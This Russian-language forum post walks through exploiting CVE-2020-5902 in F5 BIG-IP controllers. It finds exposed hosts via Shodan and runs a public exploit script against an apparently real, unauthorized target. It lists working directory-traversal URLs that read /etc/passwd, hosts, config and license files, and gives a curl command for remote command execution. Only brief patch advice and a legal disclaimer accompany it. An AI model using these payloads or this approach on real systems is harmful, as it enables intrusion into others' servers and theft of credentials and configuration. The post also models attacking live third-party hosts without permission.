Приветствую Уважаемых Форумчан,Друзей и Читателей Форума.
Сегодня поговорим про уязвимость CVE-2020-5902.
Найдём уязвимую машину и проэксплуатируем данную уязвимость на конкретном примере.
Михаил Ключников обнаружил свежую уязвимость, которая сразу же была отмечена как критическая.
Был присвоен идентификатор CVE-2020-5902 и по шкале CVSS, уязвимость соответствует наивысшему уровню опасности.
Затрагивает она интерфейс контроллера приложений BIG-IP.
Атака злоумышленником на уязвимый контроллер может быть выполнена удалённо и от имени неавторизованного юзера.
Выполнение произвольного кода приводит к вероятной раскрутке LFI и RCE
Последнее легко реализуется,если компоненты системы настроены некорректно и выходят за пределы каталога.
А c помощью произвольного кода java можно создавать и удалять файлы на хосте.
Информация предоставлена исключительно в рамках ознакомления и изучения проблем безопасности.
Запрещено применять рассматриваемые методики атак в незаконных целях.
В новостях корпорация F5 отчиталась,что уязвимость исправлена успешно.
Но это зависит не только от корпорации,а больше от владельцев ресурсов и админов.
Для проверки попробуем найти хост с помощью поисковика Shodan.
Делаем запрос и получаем список подходящих машин.
Админы некоторых уже прислушались к рекомендациям.
Проверить можно по IP-адресу с использованием различных скриптов.
Но я решил быстрее сделать это на он-лайн чекере.
Как видим, хост уязвим.
Взглянем на панель BIG-IP, всё на месте.
Если мы просто применим какой-либо обычный скрипт,то он покажет,что машина не подвержена данной уязвимости.
Некоторые отработают,но им требуется указать директорию.
Народ поторопился с их созданием и такие скрипты ещё где-то надо допиливать.
Из всех подходящих скриптов,которые позволяют эксплуатировать такую уязвимость "на лету"-F5 BIG-IP.
Специалист John Jefferson Li с Филиппин написал несколько часов назад отличный bash-скрипт.
Здесь скрипту нужен всего лишь IP адрес , а директории он сам распознает.
Установка скрипта F5BIG-IP
Код:
# git clone https://github.com/itsjeffersonli/CVE-2020-5902.git
# cd CVE-2020-5902/
# chmod +x CVE-2020-5902.sh
# ./CVE-2020-5902.shРешаем как будем эксплуатировать ,через LFI или RCE
RCE проводить не буду, т.к. вредить ресурсу не станем и никаких изменений с файлами тоже не будем делать.
Скрипт спросит какие файлы ему постараться вывести.
Если задать /etc/passwd, то получаем этот файл.
Можно выдернуть у цели и сертификат.
Эксплуатировать данную уязвимость можно и классическим способом,с помощью Burpsuite.
Для этого перехватываем запрос до директории админки /login.jsp
Изменяем запрос и проводим атаку Directory Traversal:
Код:
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+adminДля RCE используется обычно утилита Curl:
Код:
curl -v -k 'https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
И ,аналогично, получаем файл /etc/passwd
Защита и заключение.
Только обновление до последних версий BIG-IP
Использовать BIG-IP Virtual Edition 14.1.2.6;15.1.0.4;13.1.3.4
А лучше выполнить все рекомендации безопасности
Ссылка скрыта от гостей
Несмотря на усилия корпорации F5,которая быстро отреагировала на выявленную уязвимость и приняла меры, много машин по-прежнему остаются наедине с такой бедой.
Всех Благодарю за внимание и до новых встреч.
